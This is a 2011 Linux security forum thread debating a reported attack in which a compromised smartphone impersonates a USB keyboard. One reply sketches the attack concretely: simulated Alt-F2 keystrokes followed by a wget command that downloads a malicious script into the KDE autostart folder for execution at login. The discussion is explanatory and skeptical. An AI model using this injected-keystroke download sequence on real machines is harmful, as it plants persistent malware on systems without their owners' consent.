LinuxQuestions.org

LinuxQuestions.org (/questions/)
-   Linux - Security (http://www.linuxquestions.org/questions/linux-security-4/)
-   -   Zero day USB Threat (http://www.linuxquestions.org/questions/linux-security-4/zero-day-usb-threat-857608/)

thorn168 01-20-2011 01:51 PM

Zero day USB Threat
 
Hi Everyone,

Just wanted to share this zero day usb threat reported on Cnet.

It is reported to affect Linux Machines.

Here is the link:

http://news.cnet.com/8301-27080_3-20...CmoreStories.0

jlinkels 01-20-2011 02:07 PM

Quote:

...wrote software that changes the functionality of the USB driver so that they could launch a surreptitious attack
It is not quite clear to me exactly what functionality has been added and where. Is it the USB driver of the host (= the machine to be compromised?) How would that be done?

Is it in the USB device? So if the USB device emulates a keyboard, so what? Would the risk be greater as an arbitrary keyboard connected to a Linux computer? Does the human interface get administrator rights by magic?

To me it looks a little bit like the author has once seen a Linux computer which did not pop up a window when a USB device was connected, and based on that drew the conclusion that a dangerous situation could arise. (Like the "warning! are you sure that you want to continue..." dialog boxes in Windows protect users from doing something stupid!)

jlinkels

silvyus_06 01-20-2011 02:14 PM

and what can we do about that?
"oh, i know, don't use smartphones , their too smart asses" hhaahha

H_TeXMeX_H 01-20-2011 02:47 PM

I think they're hacking the computer using a charging phone ... this, of course, assumes that the phone was hacked. Meh, not that interesting. Why would I charge my phone with a usb port (in doesn't even have a USB port), and how would it get hacked ? This is more of a phone security issue, that happens to also affect computers connected to it.

John VV 01-20-2011 11:36 PM

it is turning the phone into a keyboard using a usb cable

when one plugs in the "hacked phone" it is seen as the keyboard and NOT as the phone
then the "new" keyboard has root access to the system and the payload can be inserted


but if you have physical access then this can be done by other means so...
Ars has a review of the cnet news
http://arstechnica.com/security/news...sb-drivers.ars

jschiwal 01-21-2011 12:00 AM

John VV: Plugging in a usb keyboard device gives you a root shell?

win32sux 01-21-2011 06:16 AM

Extremely interesting vulnerability! Thanks for the link to the article! :)

thorn168 01-21-2011 10:29 AM

At first blush this exploit may not seem very threatening, but if you replace the smartphone with say an iPod or similar usb charging device, trouble could follow. In context who would have imagined that something like Stuxnet would be a threat as it specifically targeted only a very specific OS running a centrifuge.

jlinkels 01-21-2011 03:54 PM

But then again, how does it work, and how does it work in Linux? Like I asked before, the article is by far not specific enough. Apparently you understand it well enough to consider it a threat, so please explain.

About Stuxnet: Infection of the PLC's was done thru infecting Windows PC's. Siemens (the PLC manufacturer) builds industrial equipment based on proprietary hardware, but relies for both development and user interface fully on Windows. Not even hardened or embedded Windows, but plain commercial desktop XP. Many protocols between PLC's and Windows are proprietary, and only available on Windows. I gather it to be not that difficult to infect a Windows PC and then, while there are already open connections between PC's and PLC's to use these connections to crack the PLC. The development protocols go much further than just oploading the software, and deeply affect the running PLC both in code and data. The originality in this Stuxnet attack was that it was focused at just one installation. Not that a PLC was infected thru a PC, and cracking the PLC is not that difficult. If it was really the US and Israel governments behind this attack they had plenty of resources to develop such tools.

jlinkels

win32sux 01-21-2011 08:34 PM

Quote:

Originally Posted by jlinkels (Post 4232027)
It is not quite clear to me exactly what functionality has been added and where. Is it the USB driver of the host (= the machine to be compromised?) How would that be done?

Is it in the USB device? So if the USB device emulates a keyboard, so what? Would the risk be greater as an arbitrary keyboard connected to a Linux computer? Does the human interface get administrator rights by magic?

To me it looks a little bit like the author has once seen a Linux computer which did not pop up a window when a USB device was connected, and based on that drew the conclusion that a dangerous situation could arise. (Like the "warning! are you sure that you want to continue..." dialog boxes in Windows protect users from doing something stupid!)

Quote:

Originally Posted by jlinkels (Post 4233419)
But then again, how does it work, and how does it work in Linux? Like I asked before, the article is by far not specific enough. Apparently you understand it well enough to consider it a threat, so please explain.

The attack code makes the smartphone pretend to be a keyboard/mouse. This allow for really nasty stuff to be done (while the smartphone is innocently being charged/whatever), such as copying your personal documents or planting incriminating evidence on your computer. While this doesn't on its own get the bad guy privilege escalation, a root exploit can be part of the attack payload if he/she desires.

cepheus11 01-22-2011 04:55 AM

Quote:

Originally Posted by jlinkels (Post 4233419)
But then again, how does it work, and how does it work in Linux?

I can imagine the following scenario: I use KDE. The shortcut for the "Run" dialog in KDE ist Alt-F2. The autostart directory for users is ~/.kde4/Autostart. The USB stick or smartphone could register as a keyboard. Then it sends "Press Alt" - "Press F2" - "Release F2" - "Release Alt", followed by "wget --directory-prefix=~/.kde4/Autostart (URL to malicious script)" and "Enter". Next time I login, (malicious script) is executed (details like x permissions ignored here). I can see this on the screen, if I watch.

I don't consider this a real (or new) threat for me, because someone with physical access could simply do this by hand anyway. A smartphone needs to be really hacked - not just have an app installed. I don't think the app API exposes the USB driver stack to spoof the device class.

Read the discussion thread on the arstechnica article, there are some more ideas how this could be turned into a real threat.

eSelix 01-22-2011 05:58 AM

Interesting. The main reason of existence of this threat is that devices connected to USB port are not authenticated by user. It is compromise between comfort (just plug and use) and security. The USB drivers should get option to authenticate, but I don't known how one device can be distinguished by other, but the same model. So for now all devices presenting itself as keyboard or mouse should be paused (by driver) to access computer until user of this computer allow them to connect. The meantime we should not connect untrusted devices.

jlinkels 01-22-2011 06:54 AM

Well, I still fail to see the reason for the excitement in this article. A USB device is connected to a computer and emulates a keyboard. So? It is since long known exactly what risks are imposed when one has physical access to a Linux computer. One can reboot the machine and gain root access. But that is not the case here.

What is the difference between a remote SSH connection and an emulated keyboard? What is the difference between an e-mail with malicious content which can be run with user credentials and an emulated keyboard wedging in characters using the same user credentials?

As far as I understand this exploit does not enable the change of the USB driver present on the host (the computer to be infected), does it? It would be different if the USB device would provide its own driver, which is in turn using root credentials is installed by the host.

jlinkels

cepheus11 01-22-2011 08:44 AM

Quote:

Originally Posted by jlinkels (Post 4233916)
What is the difference between a remote SSH connection and an emulated keyboard? What is the difference between an e-mail with malicious content which can be run with user credentials and an emulated keyboard wedging in characters using the same user credentials?

Active contents in e-mails/web pages are even more dangerous because they come remotely and can run completely unnoticed, but they require a security hole or user interaction.

But yes, the real-life threat level of this exploit is often exaggerated.

thorn168 01-25-2011 03:23 PM

I realized that I know how someone with bad intentions could exploit this vulnerability to do bad things, but, I decline to provide this information because I do not wish to inspire those with bad intentions to "publish" a proof of concept.

Some things should just not be public knowledge.


All times are GMT -5. The time now is 02:27 AM.